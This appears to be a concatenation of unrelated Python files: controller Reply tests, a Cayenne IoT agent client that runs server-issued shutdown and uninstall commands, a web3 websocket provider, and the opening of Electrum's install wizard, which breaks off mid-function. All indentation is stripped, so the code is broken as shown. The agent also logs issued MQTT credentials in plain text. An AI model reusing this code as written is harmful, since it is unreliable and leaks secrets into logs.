q = queue.Queue()
def reply():
m, obj = q.get()
assert m == "test"
obj.reply.handle()
obj.reply.send(42)
obj.reply.take()
obj.reply.commit()
Thread(target=reply).start()
channel = controller.Channel(q, Event())
assert channel.ask("test", Mock(name="test_ask_simple")) == 42
def test_ask_shutdown(self):
q = queue.Queue()
done = Event()
done.set()
channel = controller.Channel(q, done)
with tutils.raises(Kill):
channel.ask("test", Mock(name="test_ask_shutdown"))
class TestReply:
def test_simple(self):
reply = controller.Reply(42)
assert reply.state == "unhandled"
reply.handle()
assert reply.state == "handled"
reply.send("foo")
assert reply.value == "foo"
reply.take()
assert reply.state == "taken"
with tutils.raises(queue.Empty):
reply.q.get_nowait()
reply.commit()
assert reply.state == "committed"
assert reply.q.get() == "foo"
def test_kill(self):
reply = controller.Reply(43)
reply.handle()
reply.kill()
reply.take()
reply.commit()
assert reply.q.get() == Kill
def test_ack(self):
reply = controller.Reply(44)
reply.handle()
reply.ack()
reply.take()
reply.commit()
assert reply.q.get() == 44
def test_reply_none(self):
reply = controller.Reply(45)
reply.handle()
reply.send(None)
reply.take()
reply.commit()
assert reply.q.get() is None
def test_commit_no_reply(self):
reply = controller.Reply(46)
reply.handle()
reply.take()
with tutils.raises(ControlException):
reply.commit()
reply.ack()
reply.commit()
def test_double_send(self):
reply = controller.Reply(47)
reply.handle()
reply.send(1)
with tutils.raises(ControlException):
reply.send(2)
reply.take()
reply.commit()
def test_state_transitions(self):
states = {"unhandled", "handled", "taken", "committed"}
accept = {
"handle": {"unhandled"},
"take": {"handled"},
"commit": {"taken"},
"ack": {"handled", "taken"},
}
for fn, ok in accept.items():
for state in states:
r = controller.Reply(48)
r._state = state
if fn == "commit":
r.value = 49
if state in ok:
getattr(r, fn)()
else:
with tutils.raises(ControlException):
getattr(r, fn)()
r._state = "committed" # hide warnings on deletion
def test_del(self):
reply = controller.Reply(47)
with tutils.raises(ControlException):
reply.__del__()
reply.handle()
reply.ack()
reply.take()
reply.commit()
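# As a quick reference for the tests above, the happy-path Reply lifecycle is
# (a sketch, not an additional test):
#   reply = controller.Reply(obj)  # state == "unhandled"
#   reply.handle()                 # -> "handled"
#   reply.send(value)              # stage the response value
#   reply.take()                   # -> "taken"
#   reply.commit()                 # -> "committed"; value is delivered on reply.q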
class TestDummyReply:
def test_simple(self):
reply = controller.DummyReply()
for _ in range(2):
reply.handle()
reply.ack()
reply.take()
reply.commit()
reply.mark_reset()
reply.reset()
assert reply.state == "unhandled"
def test_reset(self):
reply = controller.DummyReply()
reply.handle()
reply.ack()
reply.take()
reply.commit()
reply.mark_reset()
assert reply.state == "committed"
reply.reset()
assert reply.state == "unhandled"
def test_del(self):
reply = controller.DummyReply()
reply.__del__()
|
client.py
|
"""
This module contains the main agent client for connecting to the Cayenne server. The client connects
to the server, retrieves system info as well as sensor and actuator info, and sends that data to the server.
It also responds to messages from the server, to set actuator values, change system config settings, etc.
"""
from json import dumps, loads
from threading import Thread, Event
from time import strftime, localtime, tzset, time, sleep
from queue import Queue, Empty
from myDevices import __version__
from myDevices.utils.config import Config, APP_SETTINGS, NETWORK_SETTINGS
from myDevices.utils.logger import exception, info, warn, error, debug, logJson
from myDevices.sensors import sensors
from myDevices.system.hardware import Hardware
from myDevices.cloud.scheduler import SchedulerEngine
from myDevices.cloud.updater import Updater
from myDevices.system.systemconfig import SystemConfig
from myDevices.utils.daemon import Daemon
from myDevices.utils.threadpool import ThreadPool
# from myDevices.utils.history import History
from myDevices.utils.subprocess import executeCommand
# from hashlib import sha256
from myDevices.cloud.apiclient import CayenneApiClient
import myDevices.cloud.cayennemqtt as cayennemqtt
GENERAL_SLEEP_THREAD = 0.20
def GetTime():
"""Return string with the current time"""
tzset()
cur = time()
val = strftime("%Y-%m-%dT%T", localtime(cur))
timezone = strftime("%z", localtime(cur))
hourtime = int(timezone[1:3])
timezone = timezone[:1] + str(int(timezone[1:3]))+':'+ timezone[3:7]
if hourtime == 0:
timezone = ''
return val + timezone
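# Example (illustrative): at 2021-03-01 09:30:00 in a UTC+01:00 zone this
# returns '2021-03-01T09:30:00+1:00'; the int() round-trip above drops the
# leading zero of the hour offset, and a UTC+00:00 zone yields no suffix.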
class OSInfo():
"""Class for getting information about the OS"""
def __init__(self):
"""Initialize variables with OS information"""
try:
with open('/etc/os-release', 'r') as os_file:
for line in os_file:
splitLine = line.split('=')
if len(splitLine) < 2:
continue
key = splitLine[0].strip()
value = splitLine[1].strip().replace('"', '')
keys = ('VERSION_ID', 'ID')
if key in keys:
setattr(self, key, value)
except:
exception("OSInfo Unexpected error")
class ProcessorThread(Thread):
"""Class for processing messages from the server on a thread"""
def __init__(self, name, client):
"""Initialize processor thread"""
debug('ProcessorThread init')
Thread.__init__(self, name=name)
self.cloudClient = client
self.Continue = True
def run(self):
"""Process messages from the server until the thread is stopped"""
debug('ProcessorThread run, continue: ' + str(self.Continue))
while self.Continue:
try:
if self.cloudClient.exiting.wait(GENERAL_SLEEP_THREAD):
return
self.cloudClient.ProcessMessage()
except:
exception("ProcessorThread Unexpected error")
return
def stop(self):
"""Stop processing messages from the server"""
debug('ProcessorThread stop')
self.Continue = False
class WriterThread(Thread):
"""Class for sending messages to the server on a thread"""
def __init__(self, name, client):
"""Initialize writer thread"""
debug('WriterThread init')
Thread.__init__(self, name=name)
self.cloudClient = client
self.Continue = True
def run(self):
"""Send messages to the server until the thread is stopped"""
debug('WriterThread run')
while self.Continue:
try:
if self.cloudClient.exiting.wait(GENERAL_SLEEP_THREAD):
return
if not self.cloudClient.mqttClient.connected:
info('WriterThread mqttClient not connected')
continue
got_packet = False
topic, message = self.cloudClient.DequeuePacket()
info("topic={}, message={}".format(topic, message))
# startswith(cayennemqtt.DEV_SENSOR)
if topic or message:
got_packet = True
try:
if message or topic == cayennemqtt.JOBS_TOPIC:
if topic == cayennemqtt.DATA_TOPIC:
for sensor in message:
if sensor['channel'].startswith(cayennemqtt.DEV_SENSOR):
# "state_topic": "{}/sensor/{}/dev:{}/state".format(self.mqtt_dis_prefix, self.serial, name ),
state_topic = "sensor/{}/{}/state".format( self.cloudClient.hardware.Serial, sensor['channel'] )
sensor_message = {"domain":'sensor',"device_class":sensor['type'],"location":"",'value':sensor['value']}
sensor_message = dumps(sensor_message)
info("state_topic={} ,sensor_message={}".format(state_topic,sensor_message))
self.cloudClient.mqttClient.publish_packet(state_topic, sensor_message)
continue
elif sensor['channel'].startswith(cayennemqtt.SYS_GPIO):
info("sys.gpio={} ".format(sensor))
elif sensor['channel'].startswith("sys"):
info("sys={} ".format(sensor))
if not isinstance(message, str):
message = dumps(message)
self.cloudClient.mqttClient.publish_packet(topic, message)
message = None
except:
exception("WriterThread publish packet error")
finally:
if got_packet:
self.cloudClient.writeQueue.task_done()
except:
exception("WriterThread unexpected error")
return
def stop(self):
"""Stop sending messages to the server"""
debug('WriterThread stop')
self.Continue = False
class TimerThread(Thread):
"""Class to run a function on a thread at timed intervals"""
def __init__(self, function, interval, initial_delay=0):
"""Set function to run at intervals and start thread"""
Thread.__init__(self)
self.daemon = True  # setDaemon() is deprecated in favor of the daemon attribute
self.function = function
self.interval = interval
self.initial_delay = initial_delay
self.start()
def run(self):
"""Run function at intervals"""
sleep(self.initial_delay)
while True:
try:
self.function()
sleep(self.interval)
except:
exception("TimerThread Unexpected error")
class CloudServerClient:
"""Class to connect to the server and send and receive data"""
def __init__(self, host, port, cayenneApiHost):
"""Initialize the client configuration"""
self.HOST = host
self.PORT = port
self.CayenneApiHost = cayenneApiHost
self.config = Config(APP_SETTINGS)
self.networkConfig = Config(NETWORK_SETTINGS)
self.username = self.config.get('Agent', 'Username', None)
self.password = self.config.get('Agent', 'Password', None)
self.clientId = self.config.get('Agent', 'ClientID', None)
self.location = self.config.get('Agent', 'Location', "house0@room0@")
self.mqtt_dis_prefix = self.config.get('Agent', 'MQTT_DIS_PREFIX', "homeassistant")
self.connected = False
self.exiting = Event()
self.sensorsClient = None
def __del__(self):
"""Delete the client"""
self.Destroy()
def Start(self):
"""Connect to server and start background threads"""
try:
self.installDate = None
try:
self.installDate = self.config.get('Agent', 'InstallDate', fallback=None)
except:
pass
if not self.installDate:
self.installDate = int(time())
self.config.set('Agent', 'InstallDate', self.installDate)
if not self.username and not self.password and not self.clientId:
self.CheckSubscription()
if not self.Connect():
error('Error starting agent')
return
self.schedulerEngine = SchedulerEngine(self, 'client_scheduler')
self.readQueue = Queue()
self.writeQueue = Queue()
self.hardware = Hardware()
self.oSInfo = OSInfo()
self.count = 10000
self.buff = bytearray(self.count)
self.writerThread = WriterThread('writer', self)
self.writerThread.start()
self.processorThread = ProcessorThread('processor', self)
self.processorThread.start()
self.systemInfo = []
TimerThread(self.SendSystemInfo, 300)
self.sensorsClient = sensors.SensorsClient(self)
self.sensorsClient.SetDataChanged(self.OnDataChanged)
# TimerThread(self.SendSystemState, 30, 5)
self.updater = Updater(self.config)
self.updater.start()
events = self.schedulerEngine.get_scheduled_events()
self.EnqueuePacket(events, cayennemqtt.JOBS_TOPIC)
# self.sentHistoryData = {}
# self.historySendFails = 0
# self.historyThread = Thread(target=self.SendHistoryData)
# self.historyThread.setDaemon(True)
# self.historyThread.start()
except Exception as e:
exception('Initialize error: ' + str(e))
def Destroy(self):
"""Destroy client and stop client threads"""
info('Shutting down client')
self.exiting.set()
if hasattr(self, 'sensorsClient'):
self.sensorsClient.StopMonitoring()
if hasattr(self, 'schedulerEngine'):
self.schedulerEngine.stop()
if hasattr(self, 'updater'):
self.updater.stop()
if hasattr(self, 'writerThread'):
self.writerThread.stop()
if hasattr(self, 'processorThread'):
self.processorThread.stop()
ThreadPool.Shutdown()
self.Disconnect()
info('Client shut down')
def OnDataChanged(self, data):
"""Enqueue a packet containing changed system data to send to the server"""
try:
if len(data) > 15:
items = [{item['channel']:item['value']} for item in data if not item['channel'].startswith(cayennemqtt.SYS_GPIO)]
info('Send changed data: {} + {}'.format(items, cayennemqtt.SYS_GPIO))
else:
info('Send changed data: {}'.format([{item['channel']:item['value']} for item in data]))
# items = {}
# gpio_items = {}
# for item in data:
# if not item['channel'].startswith(cayennemqtt.SYS_GPIO):
# items[item['channel']] = item['value']
# else:
# channel = item['channel'].replace(cayennemqtt.SYS_GPIO + ':', '').split(';')
# if not channel[0] in gpio_items:
# gpio_items[channel[0]] = str(item['value'])
# else:
# gpio_items[channel[0]] += ',' + str(item['value'])
# info('Send changed data: {}, {}: {}'.format(items, cayennemqtt.SYS_GPIO, gpio_items))
except:
info('Send changed data')
self.EnqueuePacket(data)
def SendSystemInfo(self):
"""Enqueue a packet containing system info to send to the server"""
try:
currentSystemInfo = []
cayennemqtt.DataChannel.add(currentSystemInfo, cayennemqtt.SYS_OS_NAME, value=self.oSInfo.ID)
cayennemqtt.DataChannel.add(currentSystemInfo, cayennemqtt.SYS_OS_VERSION, value=self.oSInfo.VERSION_ID)
cayennemqtt.DataChannel.add(currentSystemInfo, cayennemqtt.AGENT_VERSION, value=self.config.get('Agent', 'Version', __version__))
cayennemqtt.DataChannel.add(currentSystemInfo, cayennemqtt.SYS_POWER_RESET, value=0)
cayennemqtt.DataChannel.add(currentSystemInfo, cayennemqtt.SYS_POWER_HALT, value=0)
config = SystemConfig.getConfig()
if config:
channel_map = {'I2C': cayennemqtt.SYS_I2C, 'SPI': cayennemqtt.SYS_SPI, 'Serial': cayennemqtt.SYS_UART,
'OneWire': cayennemqtt.SYS_ONEWIRE, 'DeviceTree': cayennemqtt.SYS_DEVICETREE}
for key, channel in channel_map.items():
try:
cayennemqtt.DataChannel.add(currentSystemInfo, channel, value=config[key])
except:
pass
if currentSystemInfo != self.systemInfo:
data = currentSystemInfo
if self.systemInfo:
data = [x for x in data if x not in self.systemInfo]
if data:
self.systemInfo = currentSystemInfo
info('Send system info: {}'.format([{item['channel']:item['value']} for item in data]))
self.EnqueuePacket(data)
except Exception:
exception('SendSystemInfo unexpected error')
def CheckSubscription(self):
"""Check that an invite code is valid"""
inviteCode = self.config.get('Agent', 'InviteCode', fallback=None)
if not inviteCode:
error('No invite code found in {}'.format(self.config.path))
print('Please input an invite code. This can be retrieved from the Cayenne dashboard by adding a new Raspberry Pi device.\n'
'The invite code will be part of the script name shown there: rpi_[invitecode].sh.')
inviteCode = input('Invite code: ')
if inviteCode:
self.config.set('Agent', 'InviteCode', inviteCode)
else:
print('No invite code set, exiting.')
raise SystemExit
inviteCode = self.config.get('Agent', 'InviteCode')
cayenneApiClient = CayenneApiClient(self.CayenneApiHost)
credentials = cayenneApiClient.loginDevice(inviteCode)
if credentials is None:
error('Registration failed for invite code {}, closing the process'.format(inviteCode))
raise SystemExit
else:
info('Registration succeeded for invite code {}, credentials = {}'.format(inviteCode, credentials))
self.config.set('Agent', 'Initialized', 'true')
try:
self.username = credentials['mqtt']['username']
self.password = credentials['mqtt']['password']
self.clientId = credentials['mqtt']['clientId']
self.config.set('Agent', 'Username', self.username)
self.config.set('Agent', 'Password', self.password)
self.config.set('Agent', 'ClientID', self.clientId)
except:
exception('Invalid credentials, closing the process')
raise SystemExit
def Connect(self):
"""Connect to the server"""
self.connected = False
count = 0
while not self.connected and count < 30 and not self.exiting.is_set():
try:
self.mqttClient = cayennemqtt.CayenneMQTTClient()
self.mqttClient.on_message = self.OnMessage
self.mqttClient.begin(self.username, self.password, self.clientId, self.HOST, self.PORT)
self.mqttClient.loop_start()
self.connected = True
except OSError as oserror:
Daemon.OnFailure('cloud', oserror.errno)
error('Connect failed: ' + str(self.HOST) + ':' + str(self.PORT) + ' Error:' + str(oserror))
if self.exiting.wait(30):
# If we are exiting return immediately
return self.connected
count += 1
return self.connected
def Disconnect(self):
"""Disconnect from the server"""
Daemon.Reset('cloud')
try:
if hasattr(self, 'mqttClient'):
self.mqttClient.loop_stop()
info('myDevices cloud disconnected')
except:
exception('Error stopping client')
def Restart(self):
"""Restart the server connection"""
if not self.exiting.is_set():
debug('Restarting cycle...')
sleep(1)
self.Disconnect()
self.Connect()
def CheckJson(self, message):
"""Check if a JSON message is valid"""
try:
loads(message)
except ValueError:
return False
return True
def OnMessage(self, message):
"""Add message from the server to the queue"""
info('OnMessage: {}'.format(message))
self.readQueue.put(message)
def RunAction(self, action):
"""Run a specified action"""
debug('RunAction: {}'.format(action))
result = True
command = action.copy()
self.mqttClient.transform_command(command)
result = self.ExecuteMessage(command)
return result
def ProcessMessage(self):
"""Process a message from the server"""
try:
messageObject = self.readQueue.get(False)
if not messageObject:
return False
except Empty:
return False
self.ExecuteMessage(messageObject)
def ExecuteMessage(self, message):
"""Execute an action described in a message object
Returns: True if action was executed, False otherwise."""
result = False
if not message:
return result
channel = message['channel']
info('ExecuteMessage: {}'.format(message))
if channel in (cayennemqtt.SYS_POWER_RESET, cayennemqtt.SYS_POWER_HALT):
result = self.ProcessPowerCommand(message)
elif channel.startswith(cayennemqtt.DEV_SENSOR):
result = self.ProcessSensorCommand(message)
elif channel.startswith(cayennemqtt.SYS_GPIO):
result = self.ProcessGpioCommand(message)
elif channel == cayennemqtt.AGENT_DEVICES:
result = self.ProcessDeviceCommand(message)
elif channel in (cayennemqtt.SYS_I2C, cayennemqtt.SYS_SPI, cayennemqtt.SYS_UART, cayennemqtt.SYS_ONEWIRE):
result = self.ProcessConfigCommand(message)
elif channel == cayennemqtt.AGENT_MANAGE:
result = self.ProcessAgentCommand(message)
elif channel == cayennemqtt.AGENT_SCHEDULER:
result = self.ProcessSchedulerCommand(message)
else:
info('Unknown message')
return result
def ProcessPowerCommand(self, message):
"""Process command to reboot/shutdown the system
Returns: True if command was processed, False otherwise."""
error_message = None
try:
self.EnqueueCommandResponse(message, error_message)
commands = {cayennemqtt.SYS_POWER_RESET: 'sudo shutdown -r now', cayennemqtt.SYS_POWER_HALT: 'sudo shutdown -h now'}
if int(message['payload']) == 1:
debug('Processing power command')
data = []
cayennemqtt.DataChannel.add(data, message['channel'], value=1)
self.EnqueuePacket(data)
self.writeQueue.join()
info('Calling execute: {}'.format(commands[message['channel']]))
output, result = executeCommand(commands[message['channel']])
debug('ProcessPowerCommand: {}, result: {}, output: {}'.format(message, result, output))
if result != 0:
error_message = 'Error executing shutdown command'
except Exception as ex:
error_message = '{}: {}'.format(type(ex).__name__, ex)
if error_message:
error(error_message)
data = []
cayennemqtt.DataChannel.add(data, message['channel'], value=0)
self.EnqueuePacket(data)
raise ExecuteMessageError(error_message)
return error_message is None
def ProcessAgentCommand(self, message):
"""Process command to manage the agent state
Returns: True if command was processed, False otherwise."""
error = None
try:
if message['suffix'] == 'uninstall':
output, result = executeCommand('sudo -n /etc/myDevices/uninstall/uninstall.sh', disablePipe=True)
debug('ProcessAgentCommand: {}, result: {}, output: {}'.format(message, result, output))
if result != 0:
error = 'Error uninstalling agent'
# elif message['suffix'] == 'config':
# for key, value in message['payload'].items():
# if value is None:
# info('Remove config item: {}'.format(key))
# self.config.remove('Agent', key)
# else:
# info('Set config item: {} {}'.format(key, value))
# self.config.set('Agent', key, value)
else:
error = 'Unknown agent command: {}'.format(message['suffix'])
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
if error:
raise ExecuteMessageError(error)
return error is None
def ProcessConfigCommand(self, message):
"""Process system configuration command
Returns: True if command was processed, False otherwise."""
error = None
try:
value = 1 - int(message['payload']) #Invert the value since the config script uses 0 for enable and 1 for disable
command_id = {cayennemqtt.SYS_I2C: 11, cayennemqtt.SYS_SPI: 12, cayennemqtt.SYS_UART: 13, cayennemqtt.SYS_ONEWIRE: 19}
result, output = SystemConfig.ExecuteConfigCommand(command_id[message['channel']], value)
debug('ProcessConfigCommand: {}, result: {}, output: {}'.format(message, result, output))
if result != 0:
error = 'Error executing config command'
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
return error is None
def ProcessGpioCommand(self, message):
"""Process GPIO command
Returns: True if command was processed, False otherwise."""
error = None
try:
channel = int(message['channel'].replace(cayennemqtt.SYS_GPIO + ':', ''))
result = self.sensorsClient.GpioCommand(message.get('suffix', 'value'), channel, message['payload'])
debug('ProcessGpioCommand result: {}'.format(result))
if result == 'failure':
error = 'GPIO command failed'
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
return error is None
def ProcessSensorCommand(self, message):
"""Process sensor command
Returns: True if command was processed, False otherwise."""
error = None
try:
sensor_info = message['channel'].replace(cayennemqtt.DEV_SENSOR + ':', '').split(':')
sensor = sensor_info[0]
channel = None
if len(sensor_info) > 1:
channel = sensor_info[1]
result = self.sensorsClient.SensorCommand(message.get('suffix', 'value'), sensor, channel, message['payload'])
debug('ProcessSensorCommand result: {}'.format(result))
if result is False:
error = 'Sensor command failed'
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
return error is None
def ProcessDeviceCommand(self, message):
"""Process a device command to add/edit/remove a sensor
Returns: True if command was processed, False otherwise."""
error = None
try:
payload = message['payload']
info('ProcessDeviceCommand payload: {}'.format(payload))
result = None  # avoid a NameError in the debug line below when the suffix is unknown
if message['suffix'] == 'add':
result = self.sensorsClient.AddSensor(payload['sensorId'], payload['description'], payload['class'], payload['args'])
elif message['suffix'] == 'edit':
result = self.sensorsClient.EditSensor(payload['sensorId'], payload['description'], payload['class'], payload['args'])
elif message['suffix'] == 'delete':
result = self.sensorsClient.RemoveSensor(payload['sensorId'])
else:
error = 'Unknown device command: {}'.format(message['suffix'])
debug('ProcessDeviceCommand result: {}'.format(result))
if result is False:
error = 'Device command failed'
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
return error is None
def ProcessSchedulerCommand(self, message):
"""Process command to add/edit/remove a scheduled action
Returns: True if command was processed, False otherwise."""
error = None
try:
result = None  # avoid a NameError in the debug line below for 'get'/unknown suffixes
if message['suffix'] == 'add':
result = self.schedulerEngine.add_scheduled_event(message['payload'], True)
elif message['suffix'] == 'edit':
result = self.schedulerEngine.update_scheduled_event(message['payload'])
elif message['suffix'] == 'delete':
result = self.schedulerEngine.remove_scheduled_event(message['payload'])
elif message['suffix'] == 'get':
events = self.schedulerEngine.get_scheduled_events()
self.EnqueuePacket(events, cayennemqtt.JOBS_TOPIC)
else:
error = 'Unknown schedule command: {}'.format(message['suffix'])
debug('ProcessSchedulerCommand result: {}'.format(result))
if result is False:
error = 'Schedule command failed'
except Exception as ex:
error = '{}: {}'.format(type(ex).__name__, ex)
self.EnqueueCommandResponse(message, error)
return error is None
def EnqueueCommandResponse(self, message, error):
"""Send response after processing a command message"""
if 'cmdId' not in message:
# If there is no command id we assume this is a scheduled command and don't send a response message.
return
debug('EnqueueCommandResponse error: {}'.format(error))
if error:
response = 'error,{}={}'.format(message['cmdId'], error)
else:
response = 'ok,{}'.format(message['cmdId'])
info(response)
self.EnqueuePacket(response, cayennemqtt.COMMAND_RESPONSE_TOPIC)
def EnqueuePacket(self, message, topic=cayennemqtt.DATA_TOPIC):
"""Enqueue a message packet to send to the server"""
packet = (topic, message)
self.writeQueue.put(packet)
def DequeuePacket(self):
"""Dequeue a message packet to send to the server"""
packet = (None, None)
try:
packet = self.writeQueue.get(False)
except Empty:
pass
return packet
# def SendHistoryData(self):
# """Enqueue a packet containing historical data to send to the server"""
# try:
# info('SendHistoryData start')
# history = History()
# history.Reset()
# while True:
# try:
# #If there is no acknowledgment after a minute we assume failure
# sendFailed = [key for key, item in self.sentHistoryData.items() if (item['Timestamp'] + 60) < time()]
# info('SendHistoryData previously SendFailed items: ' + str(sendFailed))
# for id in sendFailed:
# self.historySendFails += len(sendFailed)
# history.Sent(False, self.sentHistoryData[id]['HistoryData'])
# del self.sentHistoryData[id]
# historyData = history.GetHistoricalData()
# if historyData:
# data = {}
# info('SendHistoryData historyData: ' + str(historyData))
# data['MachineName'] = self.MachineId
# data['Timestamp'] = int(time())
# data['PacketType'] = PacketTypes.PT_HISTORY_DATA.value
# id = sha256(dumps(historyData).encode('utf8')).hexdigest()
# data['Id'] = id
# data['HistoryData'] = historyData
# info('Sending history data, id = {}'.format(id))
# debug('SendHistoryData historyData: ' + str(data))
# self.EnqueuePacket(data)
# #this will keep accumulating
# self.sentHistoryData[id] = data
# except Exception as ex:
# exception('SendHistoryData error' + str(ex))
# delay = 60
# if self.historySendFails > 2:
# delay = 120
# if self.historySendFails > 4:
# #Wait an hour if we keep getting send failures.
# delay = 3600
# self.historySendFails = 0
# sleep(delay)
# except Exception as ex:
# exception('SendHistoryData general exception: ' + str(ex))
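# A minimal launch sketch (host, port and API endpoint are placeholders, not
# values from this file): Start() registers the device if needed, connects over
# MQTT and spins up the writer/processor/timer threads; Destroy() tears it down.
#   client = CloudServerClient('mqtt.example.com', 8883, 'https://api.example.com')
#   client.Start()
#   ...
#   client.Destroy()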
|
websocket.py
|
import asyncio
import json
import logging
import os
from threading import (
Thread,
)
import websockets
from web3.exceptions import (
ValidationError,
)
from web3.providers.base import (
JSONBaseProvider,
)
RESTRICTED_WEBSOCKET_KWARGS = {'uri', 'loop'}
DEFAULT_WEBSOCKET_TIMEOUT = 10
def _start_event_loop(loop):
asyncio.set_event_loop(loop)
loop.run_forever()
loop.close()
def _get_threaded_loop():
new_loop = asyncio.new_event_loop()
thread_loop = Thread(target=_start_event_loop, args=(new_loop,), daemon=True)
thread_loop.start()
return new_loop
def get_default_endpoint():
return os.environ.get('WEB3_WS_PROVIDER_URI', 'ws://127.0.0.1:8546')
class PersistentWebSocket:
def __init__(self, endpoint_uri, loop, websocket_kwargs):
self.ws = None
self.endpoint_uri = endpoint_uri
self.loop = loop
self.websocket_kwargs = websocket_kwargs
async def __aenter__(self):
if self.ws is None:
self.ws = await websockets.connect(
uri=self.endpoint_uri, loop=self.loop, **self.websocket_kwargs
)
return self.ws
async def __aexit__(self, exc_type, exc_val, exc_tb):
if exc_val is not None:
try:
await self.ws.close()
except Exception:
pass
self.ws = None
class WebsocketProvider(JSONBaseProvider):
logger = logging.getLogger("web3.providers.WebsocketProvider")
_loop = None
def __init__(
self,
endpoint_uri=None,
websocket_kwargs=None,
websocket_timeout=DEFAULT_WEBSOCKET_TIMEOUT
):
self.endpoint_uri = endpoint_uri
self.websocket_timeout = websocket_timeout
if self.endpoint_uri is None:
self.endpoint_uri = get_default_endpoint()
if WebsocketProvider._loop is None:
WebsocketProvider._loop = _get_threaded_loop()
if websocket_kwargs is None:
websocket_kwargs = {}
else:
found_restricted_keys = set(websocket_kwargs.keys()).intersection(
RESTRICTED_WEBSOCKET_KWARGS
)
if found_restricted_keys:
raise ValidationError(
'{0} are not allowed in websocket_kwargs, '
'found: {1}'.format(RESTRICTED_WEBSOCKET_KWARGS, found_restricted_keys)
)
self.conn = PersistentWebSocket(
self.endpoint_uri, WebsocketProvider._loop, websocket_kwargs
)
super().__init__()
def __str__(self):
return "WS connection {0}".format(self.endpoint_uri)
async def coro_make_request(self, request_data):
async with self.conn as conn:
await asyncio.wait_for(
conn.send(request_data),
timeout=self.websocket_timeout
)
return json.loads(
await asyncio.wait_for(
conn.recv(),
timeout=self.websocket_timeout
)
)
def make_request(self, method, params):
self.logger.debug("Making request WebSocket. URI: %s, "
"Method: %s", self.endpoint_uri, method)
request_data = self.encode_rpc_request(method, params)
future = asyncio.run_coroutine_threadsafe(
self.coro_make_request(request_data),
WebsocketProvider._loop
)
return future.result()
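# A minimal usage sketch (the endpoint URI is a placeholder, and a node must be
# listening there): each request is encoded as JSON-RPC, shipped over the
# persistent websocket on the shared background event loop, and the decoded
# response is returned synchronously.
if __name__ == '__main__':
    provider = WebsocketProvider('ws://127.0.0.1:8546')
    print(provider.make_request('web3_clientVersion', []))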
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum.network import Network
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
from electrum.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
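# QPainter.drawPie expects angles in 1/16th of a degree, hence the 16* factor below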
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0] # type: InstallWizard
while True:
#wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
# current dialog
try:
out = func(*args, **kwargs)
if type(out) is not tuple:
out = (out,)
except GoBack:
if not wizard.can_go_back():
wizard.close()
raise UserCancelled
else:
# to go back from the current dialog, we just let the caller unroll the stack:
raise
# next dialog
try:
while True:
try:
run_next(*out)
except ReRunDialog:
# restore state, and then let the loop re-run next
